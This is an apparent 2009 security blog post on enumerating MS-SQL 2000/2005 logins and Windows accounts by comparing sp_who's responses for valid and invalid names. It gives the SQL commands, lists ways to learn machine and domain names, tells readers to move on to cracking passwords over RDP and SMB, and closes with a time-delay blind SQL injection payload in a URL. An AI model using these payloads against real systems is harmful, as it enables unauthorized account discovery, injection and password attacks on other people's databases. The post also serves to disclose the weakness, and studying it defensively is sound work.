MS-SQL [2000&2005] User Enumeration Via sp_who

February 5, 2009

In SQL server 2005, if you are not ‘sa’ you can’t do much. This is primarily because openrowset is by default not available unless you are privileged. Stored procedure sp_who is available for public(in mssql 2000 and 2005). This procedure “provides information about current Microsoft® SQL Server™ users and processes”.

Enumeration:

exec sp_who 'validuser';

returns no records(as you don't have privileges to see information about other users) but no errors too..:)
-------------------------
exex sp_who 'invaliduser';
returns error:
Msg 15007, Level 16, State 1, Procedure sp_who, Line 59
'invaliduser' is not a valid login or you do not have permission.

————————

Hence, you can enumerate usernames. You can also enumerate Windows users (if mixed mode authentication is enabled) like this:

exec sp_who ‘test-systemAdministrator’

and also possibly the domain users, depending upon which domain users are allowed to connect(typically domain admins).

You need to know the valid machine_name/domain_name for this to work. But that’s not a problem as this can be obtained from the following:

1. IIS NTLM authentication, which discloses machine name and domain name(use hoppy).
2. This can also be obtained from terminal services dialog box.
3. This stored procedure(sp_who) itself returns the hostname.
4. There are other several ways to obtain this.

After you have enumerated users, you know what to do next. Try cracking passwords through other services e.g. RDP, SMB etc.

Through SQL Injections use this poc to enumerate logins(assuming a blind sql injection):-

http://127.0.0.1/upload/sqlinjection/?qid=1;BEGIN TRY exec sp_who 'TEST-SYSTEMblah' END TRY BEGIN CATCH return END CATCH waitfor delay '00:00:20'--

When the username is right, it will wait for 20 seconds.

Comments

Leave a Reply

Your email address will not be published. Required fields are marked *

Trackback